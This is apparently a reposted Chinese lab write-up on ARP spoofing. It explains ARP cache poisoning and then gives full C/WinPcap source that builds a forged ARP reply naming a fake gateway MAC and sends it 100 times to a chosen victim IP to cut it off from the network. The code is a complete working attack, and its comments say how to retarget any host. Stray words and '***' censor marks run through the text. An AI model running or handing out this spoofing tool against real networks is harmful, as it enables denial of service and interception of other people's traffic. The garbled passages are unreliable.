arp欺骗

时间 2020-08-02

标签 arp 欺骗繁體版

原文原文链接

一．实验目的：缓存

一、了解基本的网络***原理和***的主要步骤；
网络

二、掌握网络***的通常思路；
ide

三、了解arp***的主要原理和过程；
spa

二．实验原理：
3d

arp***就是经过伪造ip地址和mac地址实现arp欺骗，可以在网络中产生大量的arp通讯量使网络阻塞，***者只要持续不断的发出伪造的arp响应包就能更改目标主机arp缓存中的ip-mac条目，形成网络中断或中间人***。arp***主要是存在于局域网网络中，局域网中如有一台计算机感染arp***，则感染该arp***的系统将会试图经过“arp欺骗”手段截获所在网络内其它计算机的通讯信息，并所以形成网内其它计算机的通讯故障。某机器a要向主机b发送报文，会查询本地的arp缓存表，找到b的ip地址对应的mac地址后，就会进行数据传输。若是未找到，则a广播一个arp请求报文（携带主机a的ip地址ia——物理地址pa），请求ip地址为ib的主机b回答物理地址pb。网上全部主机包括b都收到arp请求，但只有主机b识别本身的ip地址，因而向a主机发回一个arp响应报文。其中就包含有b的mac地址，a接收到b的应答后，就会更新本地的arp缓存。接着使用这个mac地址发送数据（由网卡附加mac地址）。所以，本地高速缓存的这个arp表是本地网络流通的基础，并且这个缓存是动态的。本实验的主要目的是在局域网内，实施arp***，使局域网的网关失去做用，致使局域网内部主机没法与外网通讯。
orm

// WinpCap Test.cpp : 定义控制台应用程序的入口点。blog

//ip

#include "stdafx.h"rem

#include <pcap.h>get

int _tmain(int argc, _TCHAR* argv[])

{

pcap_if_t * allAdapters;//适配器列表

pcap_if_t * adapter;

pcap_t * adapterHandle;//适配器句柄

u_char packet[ 1020 ]; //待发送的数据封包

char errorBuffer[ PCAP_ERRBUF_SIZE ];//错误信息缓冲区

if( pcap_findalldevs_ex( PCAP_SRC_IF_STRING, NULL, &allAdapters, errorBuffer ) == -1 )

{//检索机器链接的全部网络适配器

fprintf( stderr, "Error in pcap_findalldevs_ex function: %s\n", errorBuffer );

return -1;

}

if( allAdapters == NULL )

{//不存在任何适配器

printf( "\nNo adapters found! Make sure WinPcap is installed.\n" );

return 0;

}

int crtAdapter = 0;

for( adapter = allAdapters; adapter != NULL; adapter = adapter->next)

{//遍历输入适配器信息(名称和描述信息)

printf( "\n%d.%s ", ++crtAdapter, adapter->name );

printf( "-- %s\n", adapter->description );

}

printf( "\n" );

//选择适配器

int adapterNumber;

printf( "Enter the adapter number between 1 and %d:", crtAdapter );

scanf_s( "%d", &adapterNumber );

if( adapterNumber < 1 || adapterNumber > crtAdapter )

{

printf( "\nAdapter number out of range.\n" );

pcap_freealldevs( allAdapters );// 释放适配器列表

return -1;

}

adapter = allAdapters;

for( crtAdapter = 0; crtAdapter < adapterNumber - 1; crtAdapter++ )

adapter = adapter->next;

// 打开指定适配器

adapterHandle = pcap_open( adapter->name, // name of the adapter

65536, // portion of the packet to capture

// 65536 guarantees that the whole

// packet will be captured

PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode

1000, // read timeout - 1 millisecond

NULL, // authentication on the remote machine

errorBuffer // error buffer

);

if( adapterHandle == NULL )

{//指定适配器打开失败

fprintf( stderr, "\nUnable to open the adapter\n", adapter->name );

// 释放适配器列表

pcap_freealldevs( allAdapters );

return -1;

}

pcap_freealldevs( allAdapters );//释放适配器列表

//建立数据封包

packet[0] = 0xc8; packet[1] = 0x9c; packet[2] = 0xdc; packet[3] = 0x22; packet[4] = 0x6c; packet[5] = 0x58; // 被骗计算机的mac地址

packet[6] = 0xc8; packet[7] = 0x9c; packet[8] = 0xdc; packet[9] = 0x22; packet[10] = 0x62; packet[11] = 0x0f; // 本身的mac地址

packet[12] = 0x08; packet[13] = 0x06; // 以太网封装arp协议（不用动）

packet[14] = 0x00; packet[15] = 0x01; // arp第1字段：表明以太网

packet[16] = 0x08; packet[17] = 0x00; // arp第2字段：表明IP协议

packet[18] = 0x06; // arp第3字段：表明第二层地址的长度

packet[19] = 0x04; // arp第4字段：表明第三层地址的长度

packet[20] = 0x00; packet[21] = 0x02; // arp第5字段:这是一个arp应答报文; 下面的是arp的第6，7，8，9字段

packet[22] = 0xc8; packet[23] = 0x9c; packet[24] = 0xdc; packet[25] = 0x22; packet[26] = 0x62; packet[27] = 0x06; // 假的网关地址，

packet[28] = 0xac; packet[29] = 0x1c;packet[30] = 0x0f; packet[31] = 0xfe; // 网关的ip，这里是172.28.15.254（在本实验室不用改）

packet[32] = 0xc8; packet[33] = 0x9c; packet[34] = 0xdc; packet[35] = 0x22; packet[36] = 0x6c; packet[37] = 0x58; // 被骗计算机的mac地址

packet[38] = 0xac; packet[39] = 0x1c;packet[40] = 0x0f; packet[41] = 0x13; // 被骗计算机的IP地址，这里是172.28.15.19 (想骗谁，这里就改为谁的IP)

//发送数据封包

for(int ssde=0;ssde<100;ssde++)

{

pcap_sendpacket( adapterHandle, packet, 42);

Sleep(1000);

}

system( "PAUSE" );

return 0;

}

示范：